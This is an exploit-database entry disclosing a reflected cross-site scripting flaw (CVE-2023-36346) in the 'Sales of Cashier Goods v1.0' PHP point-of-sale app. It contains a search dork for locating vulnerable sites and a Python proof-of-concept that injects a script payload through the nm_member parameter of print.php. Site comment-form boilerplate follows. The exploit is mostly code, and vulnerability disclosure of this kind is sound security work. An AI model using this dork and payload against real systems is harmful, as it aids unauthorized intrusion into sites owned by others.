Sales of Cashier Goods v1.0 Cross Site Scripting (XSS)

2023.07.06

Credit: Amirhossein Bahramizadeh

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2023-36346

CWE: CWE-79

Dork: /print.php?nm_member=

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sales of Cashier Goods v1.0 Cross Site Scripting (XSS)

Dork: /print.php?nm_member=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.